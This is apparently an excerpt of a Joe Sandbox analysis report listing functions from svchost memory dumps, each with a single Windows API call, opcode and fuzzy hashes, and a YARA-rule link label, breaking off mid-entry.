                                                                        • Opcode ID: b4c8f94e9855213ba173dc59596636bd7b27006b3d0e02e7e9aba31624652748
                                                                        • Instruction ID: a53f05fd5b9306bc234bf32cf451b8c7b920271525aa23822c7f5863f11af48a
                                                                        • Opcode Fuzzy Hash: b4c8f94e9855213ba173dc59596636bd7b27006b3d0e02e7e9aba31624652748
                                                                        • Instruction Fuzzy Hash: D121B671504740AFE7228F51DC44FA7FFB8EF46310F08849AF9855B662D375A509CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06532241 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: select
                                                                        • String ID:
                                                                        • API String ID: 1274211008-0
                                                                        • Opcode ID: 11d526b553d13138ecfaaad5d7c590935fa6676e2aac917a079099f716e95bf8
                                                                        • Instruction ID: ea530d69e5efaf79749700bb7ad1a8372b7849ce9eccb52c66677ade1c47e63c
                                                                        • Opcode Fuzzy Hash: 11d526b553d13138ecfaaad5d7c590935fa6676e2aac917a079099f716e95bf8
                                                                        • Instruction Fuzzy Hash: F6216B755097809FDB22CF25DC44B62BFF8EF0A610F0984DAE984CB262D265A908DB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06532619 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetExitCodeProcess.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 065326A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: CodeExitProcess
                                                                        • String ID:
                                                                        • API String ID: 3861947596-0
                                                                        • Opcode ID: 96baa32313aa9837fe9710fc7ac71c18f3cc786519caab9d3d8a83e007371f8f
                                                                        • Instruction ID: 16d7c3872b50455bcb255bfe4488568af76c198371aa50af2154ba022f0eed56
                                                                        • Opcode Fuzzy Hash: 96baa32313aa9837fe9710fc7ac71c18f3cc786519caab9d3d8a83e007371f8f
                                                                        • Instruction Fuzzy Hash: 0521A4715093806FE712CB55DC45F96BFA8EF46214F0884DAE944DF292D668A908C771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BAE77 Relevance: 1.6, APIs: 1, Instructions: 78fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadFile.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 033BAF0D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: f0f013dca86ecfa01edd9f92977b13f77efe73d07b46c963b9cdd789f0952ca9
                                                                        • Instruction ID: 9d200e329eee6634e40be3c5fd7910c5c365de4074607abaede3c4d327ce9705
                                                                        • Opcode Fuzzy Hash: f0f013dca86ecfa01edd9f92977b13f77efe73d07b46c963b9cdd789f0952ca9
                                                                        • Instruction Fuzzy Hash: FB21D6B1409380AFD722CF11DC44F96BFB8EF46314F0884DAE9449B552D274A508CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BB3EA Relevance: 1.6, APIs: 1, Instructions: 77registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 033BB480
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: da19810c155e86fcb71f617f8b72ae6874287c7f2f9a39e2416abee59da6ecd1
                                                                        • Instruction ID: 3b2a3de891e43a606128bc5f985612438559c6b6715adbfe02476b50fa7fe2e2
                                                                        • Opcode Fuzzy Hash: da19810c155e86fcb71f617f8b72ae6874287c7f2f9a39e2416abee59da6ecd1
                                                                        • Instruction Fuzzy Hash: 4F219076508780AFD722CF11DC84FA7FFBCEF46224F08849AE9859B652D664E848C771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06530552 Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WSASocketW.WS2_32(?,?,?,?,?), ref: 065305DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Socket
                                                                        • String ID:
                                                                        • API String ID: 38366605-0
                                                                        • Opcode ID: f85ece6b29c060afc817affc8a4074e5dd17388415aa7c02567305e76b3b4f30
                                                                        • Instruction ID: d8626e641235dec2e45affb8a0c9cdedfc721b4a94cab4d580f73f7d3a88bf5a
                                                                        • Opcode Fuzzy Hash: f85ece6b29c060afc817affc8a4074e5dd17388415aa7c02567305e76b3b4f30
                                                                        • Instruction Fuzzy Hash: F0218071509380AFE721CF51DC45F96FFB8EF49224F08889EE9858B692D375A508CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06530BA6 Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: FileView
                                                                        • String ID:
                                                                        • API String ID: 3314676101-0
                                                                        • Opcode ID: 869c206f2714259cb9d24ca63f65cc39d98a6db5692c730b5d6ce1c5b544e50f
                                                                        • Instruction ID: f305b00142bc7f80a8387545eaf2c92e3a6ffacb3ac4beb0bc12373baa1998df
                                                                        • Opcode Fuzzy Hash: 869c206f2714259cb9d24ca63f65cc39d98a6db5692c730b5d6ce1c5b544e50f
                                                                        • Instruction Fuzzy Hash: A0218D71409384AFE722CB55DC44FA6FBF8EF09624F04849EE9858B692D375A908CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BAAA6 Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 033BAB25
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 6041f3718270153a1234ac134a33900ad82f3fcf0731d17bf39a369336738ed0
                                                                        • Instruction ID: 41a97c9b50349c81260bba18a15689ebd344495e5b68013bfe11cc57df985b99
                                                                        • Opcode Fuzzy Hash: 6041f3718270153a1234ac134a33900ad82f3fcf0731d17bf39a369336738ed0
                                                                        • Instruction Fuzzy Hash: 0021B071604640AFEB20DF65DC84FA6FBE8EF08310F0884A9EA458BB51E775E408CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06532310 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 06532396
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: d59532f859d11c2f27f931f15dacbcfe43654f323de844ceb16d5ffb927cf461
                                                                        • Instruction ID: dae0c7ac68c35ee575bd7fff89b07751e4c19542826826503a66fb428010a039
                                                                        • Opcode Fuzzy Hash: d59532f859d11c2f27f931f15dacbcfe43654f323de844ceb16d5ffb927cf461
                                                                        • Instruction Fuzzy Hash: C321A4B19097C05FD752CB25DC50B52BFA8AF46624F0984DAE888CF253D265E908CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06530A16 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 06530A87
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: DescriptorSecurity$ConvertString
                                                                        • String ID:
                                                                        • API String ID: 3907675253-0
                                                                        • Opcode ID: 31cbe079cd1fcf24adabc57139acabbadb5e362a2ebafee7f81bc5bfa4163e4c
                                                                        • Instruction ID: cbe7ac84f7e0e5894c0e7e5db4a8f8ad99d897f1a81c6262e6daf9b14f1101f4
                                                                        • Opcode Fuzzy Hash: 31cbe079cd1fcf24adabc57139acabbadb5e362a2ebafee7f81bc5bfa4163e4c
                                                                        • Instruction Fuzzy Hash: 47219272500304AFE720DF65DC45FABBBACEF44614F08846AE945DB691E774E508CAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 065308FE Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 0653099C
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 81a696751a0c1328893213b1f7592d4eb96419bd5e906c1aa4072781e1f04d00
                                                                        • Instruction ID: 9d12e8f6b70ef75885765a5dafa573d414f948c3de862b1077bb3b110c1de12b
                                                                        • Opcode Fuzzy Hash: 81a696751a0c1328893213b1f7592d4eb96419bd5e906c1aa4072781e1f04d00
                                                                        • Instruction Fuzzy Hash: 8D21A172909780AFE721CF11DC44F67BBF8AF45610F08849AE9459B692D324E908CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BB212 Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 033BB291
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        • Opcode ID: 79166bbeb11c1b5a4c01540b362831ba1e942cf684b9acfec99a59f37612c0d3
                                                                        • Instruction ID: 0e434571b1154d4df97a133fc5986eb6639ea543f399a0c37a1c9b5a50f3aa37
                                                                        • Opcode Fuzzy Hash: 79166bbeb11c1b5a4c01540b362831ba1e942cf684b9acfec99a59f37612c0d3
                                                                        • Instruction Fuzzy Hash: 2721A172500604AEE720DF55DC84FABFBECEF04614F08845AEA459BB55E774E5088BB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BA9BF Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(?), ref: 033BAA44
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 81113f27225f723c5bd4b683fe3424ac8b866bf578b86500147b85a0771139b1
                                                                        • Instruction ID: dec2196b9762e08268f2fa0e02f7ac8c2b918fdd2654dea3987f7f1c7b72b2b4
                                                                        • Opcode Fuzzy Hash: 81113f27225f723c5bd4b683fe3424ac8b866bf578b86500147b85a0771139b1
                                                                        • Instruction Fuzzy Hash: F6215C6540E7C09FD7138B259C64651BFB4EF57624F0E80DBD9848F6A3D268580CC772
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BAC37 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileType.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 033BACBD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: FileType
                                                                        • String ID:
                                                                        • API String ID: 3081899298-0
                                                                        • Opcode ID: 19339d5f663260973503b6ae55030dc76deedb9e23af7b3cccd237c0a1b176e2
                                                                        • Instruction ID: b5ab2cd50e4257f4168c57edcd204f523620a8be83e3997a10eaa66cc279bdb8
                                                                        • Opcode Fuzzy Hash: 19339d5f663260973503b6ae55030dc76deedb9e23af7b3cccd237c0a1b176e2
                                                                        • Instruction Fuzzy Hash: 9E21D5B54097806FE7128B15DC84BA3BFBCDF47324F0880DBE9848B693D268A909D771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06532703 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetProcessWorkingSetSize.KERNEL32(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 0653277F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessSizeWorking
                                                                        • String ID:
                                                                        • API String ID: 3584180929-0
                                                                        • Opcode ID: fb3d0207b25202cfd4d4f4f26987934e96df97f5be81acade3985d801df4c057
                                                                        • Instruction ID: 0259c99152227d54f0252d37c1a5a77700cbefb982c0dc447f96e3607fa75f21
                                                                        • Opcode Fuzzy Hash: fb3d0207b25202cfd4d4f4f26987934e96df97f5be81acade3985d801df4c057
                                                                        • Instruction Fuzzy Hash: F821D4715093806FE721CF21DC48FA7BFA8EF45620F0884AAF944DB292D374A908CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 065327E7 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetProcessWorkingSetSize.KERNEL32(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 06532863
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessSizeWorking
                                                                        • String ID:
                                                                        • API String ID: 3584180929-0
                                                                        • Opcode ID: fb3d0207b25202cfd4d4f4f26987934e96df97f5be81acade3985d801df4c057
                                                                        • Instruction ID: cc04b48367f94c360f91b42d0110d800f9ce770c85b1424763c611bc27866bd9
                                                                        • Opcode Fuzzy Hash: fb3d0207b25202cfd4d4f4f26987934e96df97f5be81acade3985d801df4c057
                                                                        • Instruction Fuzzy Hash: B021A4715097806FE721CF15DC44FA7FFA8EF46224F0884AAE944DB256D374A908CB75
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BB06A Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 033BB0DD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: 4c38ec0d872cc54d28a0bc913dcc41da0d17e90b10c28a1ae7284ecc8d831781
                                                                        • Instruction ID: 5b2be4af9181cb99b6a7e4dcb2ffbce9c899ac148d4174bf2527e0570ef51a5d
                                                                        • Opcode Fuzzy Hash: 4c38ec0d872cc54d28a0bc913dcc41da0d17e90b10c28a1ae7284ecc8d831781
                                                                        • Instruction Fuzzy Hash: 1321A4716042409FE720DF25DC85BA6FBE8EF04214F0884A9EE45CBB45EB79E508CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06530E3D Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • shutdown.WS2_32(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 06530EC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: shutdown
                                                                        • String ID:
                                                                        • API String ID: 2510479042-0
                                                                        • Opcode ID: 6c19f1fad7a0658b40f8512cef57915846e1cff06c501f5879211155fd948d30
                                                                        • Instruction ID: a2662e960ecb579f1a14b6e298e47e1faf96fbebdefaa27966bfd224babee022
                                                                        • Opcode Fuzzy Hash: 6c19f1fad7a0658b40f8512cef57915846e1cff06c501f5879211155fd948d30
                                                                        • Instruction Fuzzy Hash: 9F2192B1509380AFD7128B14DC44B96BFB8EF46624F0884DAE9849F296D369A548CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BA140 Relevance: 1.6, APIs: 1, Instructions: 70networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: send
                                                                        • String ID:
                                                                        • API String ID: 2809346765-0
                                                                        • Opcode ID: 6252acae69f420ec534802938329a9ecf6a988b1d6bc71fed452b9b770cce8a9
                                                                        • Instruction ID: 684c28b01a0c311e7f3f6ec56fb9202c071b77679518440270097dc2065db817
                                                                        • Opcode Fuzzy Hash: 6252acae69f420ec534802938329a9ecf6a988b1d6bc71fed452b9b770cce8a9
                                                                        • Instruction Fuzzy Hash: A421AF7140D3C09FD7138B61DC54A52BFB4EF47220F0A84DBD9848F5A3D269A949CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BB31A Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 033BB394
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 266d918504ccfd2c2c286b20a0e97cd7d43fa06ef2c737b5334067a23c51c567
                                                                        • Instruction ID: d42452fbf14a9b94490814c7f44a86b1eb088dbde54ad6c6e07569e6045c7fdf
                                                                        • Opcode Fuzzy Hash: 266d918504ccfd2c2c286b20a0e97cd7d43fa06ef2c737b5334067a23c51c567
                                                                        • Instruction Fuzzy Hash: 6C218E75604200AFE720CE55DC84FA7F7ECEF04614F08845AEA49CBB51DBB4E908CAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BAB7C Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 033BABF0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 420772686556d35b9764ce6b2aef63bd948e4ccababcd92615c6d376ac79be8d
                                                                        • Instruction ID: 0b5d41cb92105ee5cbe5d2decedbdaeae352372ae7e54e0d299b3cc0eb29df2c
                                                                        • Opcode Fuzzy Hash: 420772686556d35b9764ce6b2aef63bd948e4ccababcd92615c6d376ac79be8d
                                                                        • Instruction Fuzzy Hash: EF21D1759097C09FDB128B25DC95792BFB8EF06220F0984DBED848B6A3D2649908CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0653217B Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ioctlsocket.WS2_32(?,00000E24,EE396019,00000000,00000000,00000000,00000000), ref: 065321F7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: ioctlsocket
                                                                        • String ID:
                                                                        • API String ID: 3577187118-0
                                                                        • Opcode ID: f75307a17532059e18a026856d1a61a97fc709666f520994b22b7c6894b00ad9
                                                                        • Instruction ID: 4fcf021dd934982bb4a76b9980e054033d07c9b9860b438b9113fdadea6dd18e
                                                                        • Opcode Fuzzy Hash: f75307a17532059e18a026856d1a61a97fc709666f520994b22b7c6894b00ad9
                                                                        • Instruction Fuzzy Hash: FB21C3714093806FD722CF50DC44FA7BFB8EF45214F08849AF9449B252D374A508CBB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06530572 Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WSASocketW.WS2_32(?,?,?,?,?), ref: 065305DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Socket
                                                                        • String ID:
                                                                        • API String ID: 38366605-0
                                                                        • Opcode ID: 2d8ccafa4166bbb1a04df7ecc558c240e138915cc63c3a41acaf09d246ed7798
                                                                        • Instruction ID: 4e30892a6363c98c1611a78c47ba3ee43a1f1caf0acc6659b0d7780a48570ad9
                                                                        • Opcode Fuzzy Hash: 2d8ccafa4166bbb1a04df7ecc558c240e138915cc63c3a41acaf09d246ed7798
                                                                        • Instruction Fuzzy Hash: 88210171500200AFEB20CF51DC44FA6FBE8EF08724F04886EE9458A691D376E408CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06530BC6 Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: FileView
                                                                        • String ID:
                                                                        • API String ID: 3314676101-0
                                                                        • Opcode ID: 5e75fbfb838597860f00faeb26bb47211e93c557bf0feffb6cde97802132c6c5
                                                                        • Instruction ID: f036032e92bb32e6e17d73187fa1bec5f5ac45abd6200192878b95808cdbd5d5
                                                                        • Opcode Fuzzy Hash: 5e75fbfb838597860f00faeb26bb47211e93c557bf0feffb6cde97802132c6c5
                                                                        • Instruction Fuzzy Hash: 7321DC71400204AFE721DF55DC84FAAFBE8EF08624F04849AE9498B791E375F408CBB2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 065313CE Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 0653144A
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Connect
                                                                        • String ID:
                                                                        • API String ID: 3144859779-0
                                                                        • Opcode ID: de7fe5f4de715ee8f40cfaee10e23ce89d3cd7c79b62fa3d4287a1b1d43d1df8
                                                                        • Instruction ID: 79a7c4d4e321ebdb74c13d7b36af807ae6699c739077de69ca562f113432c9d2
                                                                        • Opcode Fuzzy Hash: de7fe5f4de715ee8f40cfaee10e23ce89d3cd7c79b62fa3d4287a1b1d43d1df8
                                                                        • Instruction Fuzzy Hash: 4821A175408780AFDB228F65DC44B62FFF4EF0A710F0884DAE9858B263D375A918DB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033BB4F6 Relevance: 1.6, APIs: 1, Instructions: 66windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageTimeoutA.USER32(?,00000E24), ref: 033BB571
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084944354.00000000033BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033BA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ba000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendTimeout
                                                                        • String ID:
                                                                        • API String ID: 1599653421-0
                                                                        • Opcode ID: b1fc854241c9e28a01a1c33858540afd78d2c7be21a36b991b45938166a67ed1
                                                                        • Instruction ID: 1c6e640b41530d5c3c49f5e078bc03450bb4851b90d42bf85fec6b8eb4e628fa
                                                                        • Opcode Fuzzy Hash: b1fc854241c9e28a01a1c33858540afd78d2c7be21a36b991b45938166a67ed1
                                                                        • Instruction Fuzzy Hash: 5E21A271500600AFEB31CF50DC81FA6FBB8EF04714F18845AEE459AA95D775A508CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0653168A Relevance: 1.6, APIs: 1, Instructions: 66libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNELBASE(?,00000E24), ref: 06531713
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125229825.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6530000_svchost.jbxd
                                                                        Similarity
